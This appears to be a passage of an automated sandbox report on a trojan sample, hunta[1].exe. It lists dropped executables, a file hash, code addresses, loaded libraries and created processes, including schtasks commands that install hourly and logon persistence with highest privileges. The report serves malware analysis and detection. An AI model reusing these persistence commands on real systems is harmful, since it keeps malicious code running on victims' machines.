Source: C:\Users\user\Desktop\hunta[1].exe Code function: 2_2_00E822C0 2_2_00E822C0
Source: C:\Users\user\Desktop\hunta[1].exe Code function: 2_2_00E942A0 2_2_00E942A0
Source: C:\Users\user\Desktop\hunta[1].exe Code function: 2_2_00F603A0 2_2_00F603A0
Source: C:\Users\user\Desktop\hunta[1].exe Code function: 2_2_00EF0380 2_2_00EF0380
Source: C:\Users\user\Desktop\hunta[1].exe Code function: 2_2_00E8AB50 2_2_00E8AB50
Source: C:\Users\user\Desktop\hunta[1].exe Code function: 2_2_00F63B28 2_2_00F63B28
Source: C:\Users\user\Desktop\hunta[1].exe Code function: 2_2_00F5A450 2_2_00F5A450
Source: C:\Users\user\Desktop\hunta[1].exe Code function: 2_2_00F01590 2_2_00F01590
Source: C:\Users\user\Desktop\hunta[1].exe Code function: 2_2_00F6956F 2_2_00F6956F
Source: C:\Users\user\Desktop\hunta[1].exe Code function: 2_2_00E8A720 2_2_00E8A720
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Code function: 4_2_00216076 4_2_00216076
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Code function: 4_2_00216D00 4_2_00216D00
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 14_2_0038B800 14_2_0038B800
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 14_2_00384870 14_2_00384870
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 14_2_00302040 14_2_00302040
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 14_2_0031A100 14_2_0031A100
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 14_2_003142A0 14_2_003142A0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 14_2_003022C0 14_2_003022C0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 14_2_003E3B28 14_2_003E3B28
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 14_2_0030AB50 14_2_0030AB50
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 14_2_003E03A0 14_2_003E03A0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 14_2_00370380 14_2_00370380
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 14_2_003DA450 14_2_003DA450
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 14_2_003E956F 14_2_003E956F
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 14_2_00381590 14_2_00381590
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 14_2_0030A720 14_2_0030A720
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 15_2_0038B800 15_2_0038B800
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 15_2_00384870 15_2_00384870
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 15_2_00302040 15_2_00302040
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 15_2_0031A100 15_2_0031A100
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 15_2_003142A0 15_2_003142A0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 15_2_003022C0 15_2_003022C0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 15_2_003E3B28 15_2_003E3B28
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 15_2_0030AB50 15_2_0030AB50
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 15_2_003E03A0 15_2_003E03A0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 15_2_00370380 15_2_00370380
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 15_2_003DA450 15_2_003DA450
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 15_2_003E956F 15_2_003E956F
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 15_2_00381590 15_2_00381590
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 15_2_0030A720 15_2_0030A720
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 21_2_002FB800 21_2_002FB800
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 21_2_002F4870 21_2_002F4870
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 21_2_00272040 21_2_00272040
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 21_2_0028A100 21_2_0028A100
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 21_2_002842A0 21_2_002842A0
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 21_2_002722C0 21_2_002722C0
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 21_2_00353B28 21_2_00353B28
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 21_2_0027AB50 21_2_0027AB50
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 21_2_003503A0 21_2_003503A0
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 21_2_002E0380 21_2_002E0380
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 21_2_0034A450 21_2_0034A450
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 21_2_0035956F 21_2_0035956F
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 21_2_002F1590 21_2_002F1590
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 21_2_0027A720 21_2_0027A720
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Code function: 22_2_00B56076 22_2_00B56076
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Code function: 22_2_00B56D00 22_2_00B56D00
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 24_2_002FB800 24_2_002FB800
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 24_2_002F4870 24_2_002F4870
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 24_2_00272040 24_2_00272040
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 24_2_0028A100 24_2_0028A100
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 24_2_002842A0 24_2_002842A0
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 24_2_002722C0 24_2_002722C0
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 24_2_00353B28 24_2_00353B28
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 24_2_0027AB50 24_2_0027AB50
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 24_2_003503A0 24_2_003503A0
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 24_2_002E0380 24_2_002E0380
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 24_2_0034A450 24_2_0034A450
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 24_2_0035956F 24_2_0035956F
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 24_2_002F1590 24_2_002F1590
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 24_2_0027A720 24_2_0027A720
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe 4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794
Found potential string decryption / allocating functions
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: String function: 003DD590 appears 46 times
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: String function: 0034D590 appears 46 times
One or more processes crash
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7456 -s 1640
PE file contains executable resources (Code or Archives)
Source: MyProg.exe.4.dr Static PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79
Sample file is different than original file name gathered from version info
Source: hunta[1].exe, 00000002.00000003.1321581799.0000000005BCD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAy3Info.exe0 vs hunta[1].exe
Source: hunta[1].exe, 00000002.00000003.1322295794.0000000005BC5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAy3Info.exe0 vs hunta[1].exe
Source: hunta[1].exe, 00000002.00000002.3743392087.0000000005710000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAy3Info.exe0 vs hunta[1].exe
Source: hunta[1].exe, 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameAy3Info.exe0 vs hunta[1].exe
Source: hunta[1].exe Binary or memory string: OriginalFilenameAy3Info.exe0 vs hunta[1].exe
Uses 32bit PE files
Source: hunta[1].exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: WwKLWFk.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: WwKLWFk.exe.2.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: WwKLWFk.exe.2.dr Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
Source: hunta[1].exe Static PE information: Section: ZLIB complexity 0.9998547544838146
Source: RageMP131.exe.2.dr Static PE information: Section: ZLIB complexity 0.9998547544838146
Source: MPGPH131.exe.2.dr Static PE information: Section: ZLIB complexity 0.9998547544838146
Source: classification engine Classification label: mal100.spre.troj.evad.winEXE@28/31@1/2
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Code function: 4_2_0021119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle, 4_2_0021119F
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Code function: 22_2_00B5119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle, 22_2_00B5119F
Source: C:\Users\user\Desktop\hunta[1].exe File created: C:\Users\user\AppData\Local\RageMP131 Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3996:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8008:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8056:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7456
Source: C:\Users\user\Desktop\hunta[1].exe File created: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\149657b0.bat" "
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\hunta[1].exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: hunta[1].exe, 00000002.00000003.1287200302.0000000005700000.00000004.00001000.00020000.00000000.sdmp, hunta[1].exe, 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 0000000E.00000003.1362777852.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, MPGPH131.exe, 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, MPGPH131.exe, 0000000F.00000003.1366449585.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000015.00000003.1485625722.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, RageMP131.exe, 00000018.00000003.1559253184.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: hunta[1].exe, 00000002.00000003.1287200302.0000000005700000.00000004.00001000.00020000.00000000.sdmp, hunta[1].exe, 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 0000000E.00000003.1362777852.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, MPGPH131.exe, 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, MPGPH131.exe, 0000000F.00000003.1366449585.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000015.00000003.1485625722.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, RageMP131.exe, 00000018.00000003.1559253184.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: UPDATE %Q.%s SET sql = sqlite_rename_table(sql, %Q), tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: hunta[1].exe ReversingLabs: Detection: 94%
Source: hunta[1].exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: MPGPH131.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: MPGPH131.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: RageMP131.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: RageMP131.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\hunta[1].exe File read: C:\Users\user\Desktop\hunta[1].exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\hunta[1].exe "C:\Users\user\Desktop\hunta[1].exe"
Source: C:\Users\user\Desktop\hunta[1].exe Process created: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
Source: C:\Users\user\Desktop\hunta[1].exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\hunta[1].exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\ProgramData\MPGPH131\MPGPH131.exe C:\ProgramData\MPGPH131\MPGPH131.exe
Source: unknown Process created: C:\ProgramData\MPGPH131\MPGPH131.exe C:\ProgramData\MPGPH131\MPGPH131.exe
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7456 -s 1640
Source: unknown Process created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process created: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
Source: unknown Process created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\149657b0.bat" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\hunta[1].exe Process created: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Jump to behavior
Source: C:\Users\user\Desktop\hunta[1].exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST Jump to behavior
Source: C:\Users\user\Desktop\hunta[1].exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process created: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\149657b0.bat" " Jump to behavior
Source: C:\Users\user\Desktop\hunta[1].exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\hunta[1].exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\hunta[1].exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\hunta[1].exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\hunta[1].exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\hunta[1].exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\hunta[1].exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\hunta[1].exe Section loaded: devobj.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: ntvdm64.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: ntvdm64.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: ntvdm64.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: winmm.dll Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: wininet.dll Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: devobj.dll Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: winmm.dll Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: wininet.dll Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: devobj.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: devobj.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: ntvdm64.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: ntvdm64.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: ntvdm64.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: ntvdm64.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: ntvdm64.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: appresolver.dll Jump to behavior
